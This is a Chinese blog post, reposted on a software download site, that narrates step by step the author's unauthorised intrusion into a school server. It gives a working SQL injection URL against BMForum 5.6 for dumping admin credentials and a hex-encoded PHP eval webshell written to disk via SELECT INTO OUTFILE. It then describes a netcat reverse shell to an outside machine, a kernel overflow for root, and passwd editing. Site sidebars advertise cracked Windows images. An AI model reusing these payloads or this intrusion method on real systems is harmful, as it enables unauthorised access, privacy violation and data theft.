linux系统从入侵到提权的详细过程(图文)
前奏:无意间拿下了学校一台检测网络访问的服务器,无意间看到一个远程登录的信息,遂对此网段扫描了一下80端口。。。
上个J8,就是那个上网检测东西。。
其实记录的很详细,没有加密的聊天内容都可以看到。我还是比较尊重他人隐私的,所以只查看了一些上网行为。
刚才说了,扫了一下那个网段的80端口,有一个开着,就点进去看了一下,是BMForum 2007 5.6的论坛,php的。
老系统了,记得前几年爆了个注入,也不知道是不是这个版本,上db-exploit看了一下,艹,中枪了。
————————-下面的来自db-exploit————————
BMForum 5.6 (tagname) Remote SQL Injection Vulnerability
Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: BMForum
Version: 5.6
URL: www.bmforum.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off
Exploit:
http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1′+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*
# milw0rm.com [2008-10-01]
于是乎….
不用猜你就懂了,密码是admin。
进后台了,这个模式我不是很喜欢,翻了半天没找到能上传的地方。上J8。
不过,还是好好找,依然能找到可以利用的东西,发现了这个后台有phpinfo()和SQL执行。
看了一下,是root权限,也得到了web目录,如果没开启魔术引号,可以考虑into outfile。
补一句:mysql的root权限在linux下一般没什么用,有写权限就不错了,如果是windows系统,可以考虑导出udf.dll。
管理员百密一疏啊,没开魔术引号~~蛤蛤,大快人心!!~
直接select一句话木马,然后导出到文件~~
下面那一段十六进制字符串是www.jb51.net <?php eval($_REQUEST[fuck]);?> 的hex值
select 0x3C3F706870206576616C28245F524551554553545B6675636B5D293B3F3E into outfile ‘/usr/local/bmf/bmb/datafile/x.php’
然后成功得到shell。如图。
接下来,试试菜刀里能不能执行命令,下面就要考虑提权了。
试了一下,看似可以执行命令,也得到了一些服务器信息。
2.6.9-22的内核,有溢出。
这个终端有个毛病,就是不能即时回显,毕竟是通过webshell虚拟的终端,所以,还需要nc来反弹一个shell,用于溢出。
这个服务器上已经装了nc,可是是阉割过的,不能指向bash,所以,下载源码,编译。
用wget在sourceforge.net上下载,就不多说了。。
编译什么的,也是so easy。实在不行就百度一个i386架构下编译的linux版netcat。
下面的工作就是要反弹shell了,一台外网的机子是必须的,就算不是外网,能映射也行。
刚好手头有个映射过端口的服务器,如果是外网服务器,就更简单了,详见netcat使用帮助。
http://wenku.baidu.com/view/f77334ee19e8b8f67c1cb9fe.html
好了,开始反弹吧。。。
很好,反弹成功,已经可以执行一些低权限的命令的。
接着提权吧。上传了一个叫做“x”的程序,用于溢出。
蛤蛤,溢出成功了,已经是root权限了,下面加用户什么的就不说了,你懂的~~
唠叨一句,变身成root的方法。。。修改/etc/passwd
这是我用pietty连接ssh之后,查看passwd,已经改成root了
作者 sunrise@luzix.com from:情'blog
推荐系统
雨林木风 winxp下载 纯净版 永久激活 winxp ghost系统 sp3 系统下载
系统大小:0MB系统类型:WinXP雨林木风在系统方面技术积累雄厚深耕多年,打造了国内重装系统行业知名品牌,雨林木风WindowsXP其系统口碑得到许多人认可,积累了广大的用户群体,是一款稳定流畅的系统,雨林木风 winxp下载 纯净版 永久激活 winxp ghost系统 sp3 系统下载,有需要的朋友速度下载吧。
系统等级:进入下载 >萝卜家园win7纯净版 ghost系统下载 x64 联想电脑专用
系统大小:0MB系统类型:Win7萝卜家园win7纯净版是款非常纯净的win7系统,此版本优化更新了大量的驱动,帮助用户们进行舒适的使用,更加的适合家庭办公的使用,方便用户,有需要的用户们快来下载安装吧。
系统等级:进入下载 >雨林木风xp系统 xp系统纯净版 winXP ghost xp sp3 纯净版系统下载
系统大小:1.01GB系统类型:WinXP雨林木风xp系统 xp系统纯净版 winXP ghost xp sp3 纯净版系统下载,雨林木风WinXP系统技术积累雄厚深耕多年,采用了新的系统功能和硬件驱动,可以更好的发挥系统的性能,优化了系统、驱动对硬件的加速,加固了系统安全策略,运行环境安全可靠稳定。
系统等级:进入下载 >萝卜家园win10企业版 免激活密钥 激活工具 V2023 X64位系统下载
系统大小:0MB系统类型:Win10萝卜家园在系统方面技术积累雄厚深耕多年,打造了国内重装系统行业的萝卜家园品牌,(win10企业版,win10 ghost,win10镜像),萝卜家园win10企业版 免激活密钥 激活工具 ghost镜像 X64位系统下载,其系统口碑得到许多人认可,积累了广大的用户群体,萝卜家园win10纯净版是一款稳定流畅的系统,一直以来都以用户为中心,是由萝卜家园win10团队推出的萝卜家园
系统等级:进入下载 >萝卜家园windows10游戏版 win10游戏专业版 V2023 X64位系统下载
系统大小:0MB系统类型:Win10萝卜家园windows10游戏版 win10游戏专业版 ghost X64位 系统下载,萝卜家园在系统方面技术积累雄厚深耕多年,打造了国内重装系统行业的萝卜家园品牌,其系统口碑得到许多人认可,积累了广大的用户群体,萝卜家园win10纯净版是一款稳定流畅的系统,一直以来都以用户为中心,是由萝卜家园win10团队推出的萝卜家园win10国内镜像版,基于国内用户的习惯,做
系统等级:进入下载 >windows11下载 萝卜家园win11专业版 X64位 V2023官网下载
系统大小:0MB系统类型:Win11萝卜家园在系统方面技术积累雄厚深耕多年,windows11下载 萝卜家园win11专业版 X64位 官网正式版可以更好的发挥系统的性能,优化了系统、驱动对硬件的加速,使得软件在WINDOWS11系统中运行得更加流畅,加固了系统安全策略,WINDOWS11系统在家用办公上跑分表现都是非常优秀,完美的兼容各种硬件和软件,运行环境安全可靠稳定。
系统等级:进入下载 >
相关文章
- 安卓手机QQ 4.7.2正式发布 显示在线好友的网络状态
- 瑞星安全随身WiFi怎么用 瑞星随身WiFi有何亮点以及使用方法
- 您的WiFi安全吗?让路由卫士来为您把关让它变得更快,更安全
- 大势至局域网共享文件管理软件详细记录服务器共享文件访问日志、保护共享文件安全
- 金山毒霸发布全新的V11新春版:杀毒速度更快/软件净化
- WinXP如何进入安全模式?WinXP进入安全模式设置
- 怎样消除免费WIFI的安全隐患?一张图看懂免费WIFI的安全隐患
- 毒app优惠券怎么获得 毒app无门槛优惠券攻略
- 京东通信卡流量超标怎样关闭移动网络?
- 详解火绒安全软件怎么样
- Win10系统下安全登录失败初始化失败怎么办?
- 360安全卫士怎么更改默认软件?
- 360称特斯拉应用存漏洞 特斯拉不安全?
- win10安全模式跳过开机密码可行吗
热门系统
推荐软件
推荐应用
推荐游戏
热门文章
常用系统
- 1windows10家庭版下载 系统之家 x86改良版下载 戴尔笔记本专用
- 2Windows10电竞战斗版下载 雨林木风最新游戏版 x64位免密钥 戴尔笔记本专用下载
- 3萝卜家园win10专业版 Ghost系统镜像下载安装 V2022.06
- 4深度技术win10纯净版 免激活工具下载 x64位无病毒大神版 惠普电脑专用
- 5win10旗舰版系统下载 深度技术Windows10 x64位系统下载 永久激活
- 6萝卜家园x64位纯净版 笔记本专用下载 win10无广告不卡顿版 ghost镜像下载
- 7技术员联盟教育版国庆献礼版下载 win10企业版 X64位 笔记本专用下载 v2023
- 8win7娱乐版 中文系统 ghost x64位 win7激活密钥 无需激活码 iso镜像下载
- 9萝卜家园x86家庭版 win7改良版下载 win7镜像系统 免激活工具下载